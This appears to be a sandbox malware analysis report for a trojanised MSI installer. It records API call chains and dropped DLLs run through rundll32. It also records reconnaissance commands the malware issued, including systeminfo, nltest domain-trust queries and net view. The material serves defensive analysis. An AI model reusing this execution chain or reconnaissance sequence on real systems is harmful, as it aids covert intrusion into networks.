                      Source: Joe Sandbox ViewDropped File: :wtfbbq (copy) 1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSID3EB.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018000CF30 appears 33 times
                      Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180005348 appears 71 times
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00B43292 appears 70 times
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00B43790 appears 39 times
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00B4325F appears 103 times
                      Source: ad.msiBinary or memory string: OriginalFilenameviewer.exeF vs ad.msi
                      Source: ad.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs ad.msi
                      Source: classification engineClassification label: mal100.spre.troj.evad.winMSI@38/31@2/2
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,6_2_0000000180049050
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018004B1A4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,6_2_0000000180049278
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018008395A DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018008395A
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B23860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,FindCloseChangeNotification,Process32NextW,CloseHandle,5_2_00B23860
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B24BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,5_2_00B24BA0
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B245B0 LoadResource,LockResource,SizeofResource,5_2_00B245B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,6_2_0000000180049AEC
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLD87F.tmpJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_03
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\runnung
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID3EB.tmpJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Installer\MSID8B1.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: rundll32.exe, rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drBinary or memory string: select * from sqlite_sequence;
                      Source: rundll32.exe, rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drBinary or memory string: update sqlite_sequence set seq = 0 where name='MT';
                      Source: ad.msiVirustotal: Detection: 8%
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSID8B1.tmp "C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B CJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSID8B1.tmp "C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homqJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c ipconfig /allJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c systeminfoJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c net view /all /domainJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trustsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trustsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\nltest.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: browcli.dllJump to behavior
                      Source: C:\Windows\System32\net.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: ad.msiStatic file information: File size 1619456 > 1048576
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,6_2_00000001800033E0
                      Source: Update_77697333.dll.6.drStatic PE information: real checksum: 0xe14a2 should be: 0xe5e2c
                      Source: 360total.dll.1.drStatic PE information: real checksum: 0xe14a2 should be: 0xe5e2c
                      Source: 360total.dll.1.drStatic PE information: section name: yhDm^
                      Source: Update_77697333.dll.6.drStatic PE information: section name: yhDm^
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4323C push ecx; ret 5_2_00B4324F
